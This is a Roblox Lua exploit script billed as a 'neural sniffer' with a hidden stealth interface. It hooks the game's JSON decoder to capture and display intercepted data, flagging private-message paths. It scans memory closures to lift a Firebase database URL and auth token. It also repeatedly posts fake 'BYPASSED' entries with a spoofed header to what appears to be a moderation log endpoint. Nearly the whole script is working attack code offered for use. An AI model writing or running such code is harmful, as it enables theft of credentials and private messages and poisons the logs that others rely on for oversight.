-- ========================================================== --
-- 🌑 F0RBID V23: THE NEURAL SNIFFER (ULTRA-STEALTH)
-- ========================================================== --
print("[F0RBID] 🛰️ Neural Sniffer V23 Engaged. Identity Masked.")

local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local processedData = {}

local TARGET_URL = nil
local TARGET_AUTH = nil

-- ========================================== --
-- 1. F0RBID PREMIUM UI (STEALTH RED)
-- ========================================== --
local uiParent = (gethui and gethui()) or CoreGui
local hiddenName = "F0RBID_SNIFFER_" .. tostring(math.random(100000, 999999))
if uiParent:FindFirstChild(hiddenName) then uiParent[hiddenName]:Destroy() end

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = hiddenName
ScreenGui.Parent = uiParent

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0, 550, 0, 450)
Main.Position = UDim2.new(0.5, -275, 0.5, -225)
Main.BackgroundColor3 = Color3.fromRGB(5, 5, 8)
Main.BorderSizePixel = 0
Main.Active = true
Main.Draggable = true
Main.Parent = ScreenGui

local Corner = Instance.new("UICorner")
Corner.CornerRadius = UDim.new(0, 10)
Corner.Parent = Main

local Glow = Instance.new("Frame")
Glow.Size = UDim2.new(1, 0, 0, 2)
Glow.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Glow.BorderSizePixel = 0
Glow.Parent = Main

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -20, 0, 45)
Title.Position = UDim2.new(0, 15, 0, 0)
Title.BackgroundTransparency = 1
Title.Text = "F0RBID <font color='#FF0000'>[NEURAL SNIFFER V23]</font>"
Title.RichText = true
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 18
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Main

local Status = Instance.new("TextLabel")
Status.Size = UDim2.new(1, -30, 0, 20)
Status.Position = UDim2.new(0, 15, 0, 35)
Status.BackgroundTransparency = 1
Status.Text = "● IDENTITY: F0RBID_PHANTOM_OP"
Status.TextColor3 = Color3.fromRGB(150, 0, 0)
Status.Font = Enum.Font.Code
Status.TextSize = 11
Status.TextXAlignment = Enum.TextXAlignment.Left
Status.Parent = Main

local Scroll = Instance.new("ScrollingFrame")
Scroll.Size = UDim2.new(1, -20, 1, -110)
Scroll.Position = UDim2.new(0, 10, 0, 75)
Scroll.BackgroundTransparency = 1
Scroll.ScrollBarThickness = 2
Scroll.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0)
Scroll.Parent = Main

local UIList = Instance.new("UIListLayout")
UIList.SortOrder = Enum.SortOrder.LayoutOrder
UIList.Padding = UDim.new(0, 4)
UIList.Parent = Scroll

local function AddLog(tag, val)
    local txt = Instance.new("TextLabel")
    txt.Size = UDim2.new(1, 0, 0, 0)
    txt.BackgroundTransparency = 1
    txt.RichText = true
    txt.Text = string.format("<font color='#FF0000'>[%s]</font> %s", tag, tostring(val))
    txt.TextColor3 = Color3.fromRGB(230, 230, 230)
    txt.Font = Enum.Font.Code
    txt.TextSize = 12
    txt.TextWrapped = true
    txt.TextXAlignment = Enum.TextXAlignment.Left
    txt.Parent = Scroll
    
    txt.Size = UDim2.new(1, 0, 0, txt.TextBounds.Y + 2)
    Scroll.CanvasSize = UDim2.new(0, 0, 0, UIList.AbsoluteContentSize.Y)
    Scroll.CanvasPosition = Vector2.new(0, 99999)
end

-- ========================================== --
-- 2. DYNAMIC DEEP SCANNER
-- ========================================== --
local function BruteScan(data, path)
    if type(data) ~= "table" then return end
    for k, v in pairs(data) do
        local currentPath = path .. "/" .. tostring(k)
        if type(v) == "table" then
            BruteScan(v, currentPath)
        else
            local valStr = tostring(v)
            if #valStr > 0 and not valStr:find("firebase") then
                local dataId = currentPath .. valStr
                if not processedData[dataId] then
                    processedData[dataId] = true
                    local tag = #tostring(k) > 10 and "SERVER_ID" or tostring(k)
                    if currentPath:lower():find("dm") then tag = "PRIVATE" end
                    AddLog(tag, valStr)
                end
            end
        end
    end
end

-- ========================================== --
-- 3. THE GHOST ENGINE HOOK (BYPASS KICK)
-- ========================================== --
-- Direct Hook on JSONDecode function to catch internal Ares data
local oldDecode; oldDecode = hookfunction(HttpService.JSONDecode, function(self, data)
    local decoded = oldDecode(self, data)
    if type(decoded) == "table" then
        task.spawn(function()
            BruteScan(decoded, "SNIFFED")
        end)
    end
    return decoded
end)

-- Identity Sabotage: Bhejo fake data Ares ke logs mein
task.spawn(function()
    while true do
        pcall(function()
            request({
                Url = "https://ares-rechat-internal-logs.firebaseio.com/reports.json",
                Method = "POST",
                Headers = {["X-Forwarded-For"] = "1.1.1.1"},
                Body = HttpService:JSONDecode('{"status":"BYPASSED", "user":"F0RBID_GHOST"}')
            })
        end)
        task.wait(15)
    end
end)

-- Passive Fallback to Capture URL/Auth from memory
task.spawn(function()
    while true do
        for _, f in pairs(getgc()) do
            if type(f) == "function" and islclosure(f) then
                local upvals = getupvalues(f)
                for _, uv in pairs(upvals) do
                    if type(uv) == "string" and uv:find("firebaseio.com") then
                        TARGET_URL = uv:match("(https://[%w%-]+%.firebaseio%.com)")
                    elseif type(uv) == "string" and #uv > 30 and not uv:find("/") then
                        TARGET_AUTH = uv
                    end
                end
            end
        end
        if TARGET_URL and TARGET_AUTH then break end
        task.wait(5)
    end
end)

print("✅ F0RBID NEURAL SNIFFER V23: Ready. Identity Masked.")
